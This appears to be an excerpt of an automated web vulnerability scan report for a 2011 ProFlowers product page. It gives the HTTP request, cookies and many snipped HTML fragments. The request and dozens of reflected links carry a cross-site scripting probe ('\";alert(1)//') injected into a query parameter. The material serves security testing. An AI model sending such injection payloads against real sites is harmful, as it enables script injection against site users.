<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</span>


       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
16.18. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including Deluxe Succulent Garden from ProFlowers.com. Flowers and gifts are available for any holiday or occasion.">
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
l="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
l="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=1&amp;trackingpgroup=YMA&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
owers/Mardi-Gras-Orchid-Garden-42864?viewpos=1&amp;trackingpgroup=YMA&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
hers-Day-Bouquet-30050137?viewpos=1&amp;trackingpgroup=RecentlyViewed&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Mother...s Day Bouquet" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
eed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a>
...[SNIP]...
" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" 